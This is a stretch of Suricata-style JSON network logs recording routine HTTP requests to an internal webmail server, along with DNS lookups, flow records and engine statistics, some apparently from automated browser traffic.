{"timestamp":"2020-02-29T00:07:43.001397+0000","flow_id":542306914958372,"event_type":"flow","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:06:30.687140+0000","end":"2020-02-29T00:06:42.570839+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:43.818348+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49223,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31542,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:07:43.926789+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":31542,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:43.926789+0000","flow_id":2246425387862493,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49223,"proto":"UDP","dns":{"type":"answer","id":31542,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:44.000900+0000","flow_id":1825376840178270,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"158.69.60.196","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:02:43.449118+0000","end":"2020-02-29T00:02:43.556107+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:44.089851+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6933}} {"timestamp":"2020-02-29T00:07:46.417076+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46500,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63556,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:46.525040+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46500,"proto":"UDP","dns":{"type":"answer","id":63556,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:46.525040+0000","flow_id":360397875076404,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46500,"proto":"UDP","dns":{"type":"answer","id":63556,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:46.658213+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136}} {"timestamp":"2020-02-29T00:07:47.000342+0000","flow_id":28091940766251,"event_type":"flow","src_ip":"192.168.10.122","src_port":43799,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:46.754219+0000","end":"2020-02-29T00:02:46.861282+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:47.001038+0000","flow_id":2218946168519686,"event_type":"flow","src_ip":"192.168.10.122","src_port":33488,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:46.228358+0000","end":"2020-02-29T00:02:46.339559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000525+0000","flow_id":1874300828193260,"event_type":"flow","src_ip":"192.168.10.81","src_port":52694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":8,"bytes_toserver":1013,"bytes_toclient":6180,"start":"2020-02-29T00:06:41.856556+0000","end":"2020-02-29T00:06:47.067758+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:48.000794+0000","flow_id":206771170309255,"event_type":"flow","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.390279+0000","end":"2020-02-29T00:02:47.501100+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000908+0000","flow_id":406165026970995,"event_type":"flow","src_ip":"192.168.10.122","src_port":33988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.204147+0000","end":"2020-02-29T00:02:47.309811+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.000998+0000","flow_id":979672010002716,"event_type":"flow","src_ip":"192.168.10.122","src_port":36753,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:47.528668+0000","end":"2020-02-29T00:02:47.634105+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:48.966645+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=E4CyMdGf1_ahUkbupqNOwDc&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6933},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:07:48.976304+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47241,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:49.000515+0000","flow_id":2186244303009272,"event_type":"flow","src_ip":"192.168.10.130","src_port":34750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1225,"bytes_toclient":7931,"start":"2020-02-29T00:06:42.570872+0000","end":"2020-02-29T00:06:48.567753+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:07:49.084348+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51696,"proto":"UDP","dns":{"type":"answer","id":47241,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:49.084348+0000","flow_id":1914802374239664,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51696,"proto":"UDP","dns":{"type":"answer","id":47241,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:49.166484+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7998}} {"timestamp":"2020-02-29T00:07:50.000246+0000","event_type":"stats","stats":{"uptime":14122,"capture":{"kernel_packets":133873,"kernel_drops":0},"decoder":{"pkts":133891,"bytes":92577100,"invalid":183,"ipv4":132430,"ipv6":8,"ethernet":133891,"raw":0,"null":0,"sll":0,"tcp":127290,"udp":4942,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2254,"failed_udp":110},"tx":{"http":4551,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2332}},"flow_mgr":{"closed_pruned":2698,"new_pruned":15,"est_pruned":2304,"bypassed_pruned":0,"flows_checked":8,"flows_notimeout":6,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65528,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19181,"memcap_state":0,"memcap_global":0},"http":{"memuse":105545,"memcap":0}}} {"timestamp":"2020-02-29T00:07:51.409000+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30699,"tx_id":0}} {"timestamp":"2020-02-29T00:07:51.417961+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40322,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32979,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:51.525948+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40322,"proto":"UDP","dns":{"type":"answer","id":32979,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:51.525948+0000","flow_id":872744524144809,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40322,"proto":"UDP","dns":{"type":"answer","id":32979,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:51.606717+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383}} {"timestamp":"2020-02-29T00:07:51.897720+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8383},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":35098,"tx_id":1}} {"timestamp":"2020-02-29T00:07:51.908564+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1153,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:07:52.016611+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60758,"proto":"UDP","dns":{"type":"answer","id":1153,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:07:52.016611+0000","flow_id":859382880918804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60758,"proto":"UDP","dns":{"type":"answer","id":1153,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:07:52.097412+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:07:52.097516+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:07:54.171367+0000","flow_id":2004988097150431,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34760,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7998},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":31377,"tx_id":1}} {"timestamp":"2020-02-29T00:07:57.000166+0000","event_type":"stats","stats":{"uptime":14129,"capture":{"kernel_packets":133931,"kernel_drops":0},"decoder":{"pkts":133933,"bytes":92600525,"invalid":183,"ipv4":132470,"ipv6":8,"ethernet":133933,"raw":0,"null":0,"sll":0,"tcp":127324,"udp":4948,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2257,"failed_udp":110},"tx":{"http":4554,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2335}},"flow_mgr":{"closed_pruned":2700,"new_pruned":15,"est_pruned":2307,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19843,"memcap_state":0,"memcap_global":0},"http":{"memuse":76081,"memcap":0}}} {"timestamp":"2020-02-29T00:07:57.000953+0000","flow_id":1853994208105121,"event_type":"flow","src_ip":"192.168.10.122","src_port":37326,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:02:56.692897+0000","end":"2020-02-29T00:02:56.798619+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:07:57.100639+0000","flow_id":642560046543245,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2334,"tx_id":2}} {"timestamp":"2020-02-29T00:08:02.053815+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9702,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:02.162101+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58162,"proto":"UDP","dns":{"type":"answer","id":9702,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:02.162101+0000","flow_id":1012670264431159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58162,"proto":"UDP","dns":{"type":"answer","id":9702,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:02.253251+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:08:02.253251+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:08:03.000491+0000","flow_id":1908200990740010,"event_type":"flow","src_ip":"192.168.10.122","src_port":42172,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:02.101930+0000","end":"2020-02-29T00:03:02.213187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:04.000248+0000","event_type":"stats","stats":{"uptime":14136,"capture":{"kernel_packets":133933,"kernel_drops":0},"decoder":{"pkts":133936,"bytes":92600723,"invalid":183,"ipv4":132473,"ipv6":8,"ethernet":133936,"raw":0,"null":0,"sll":0,"tcp":127327,"udp":4948,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2717,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2733,"synack":2724,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1760,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2257,"failed_udp":110},"tx":{"http":4554,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2335}},"flow_mgr":{"closed_pruned":2700,"new_pruned":15,"est_pruned":2308,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":76074,"memcap":0}}} {"timestamp":"2020-02-29T00:08:06.000428+0000","flow_id":1901152949615255,"event_type":"flow","src_ip":"192.168.10.122","src_port":59490,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:05.506519+0000","end":"2020-02-29T00:03:05.617809+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:06.000596+0000","flow_id":2199893709972968,"event_type":"flow","src_ip":"192.168.10.130","src_port":34754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":20,"bytes_toserver":3061,"bytes_toclient":18001,"start":"2020-02-29T00:06:56.878056+0000","end":"2020-02-29T00:07:05.888377+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:07.254604+0000","flow_id":1274951032280348,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34764,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":613,"tx_id":0}} {"timestamp":"2020-02-29T00:08:07.957566+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62353,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:07.963657+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47439,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 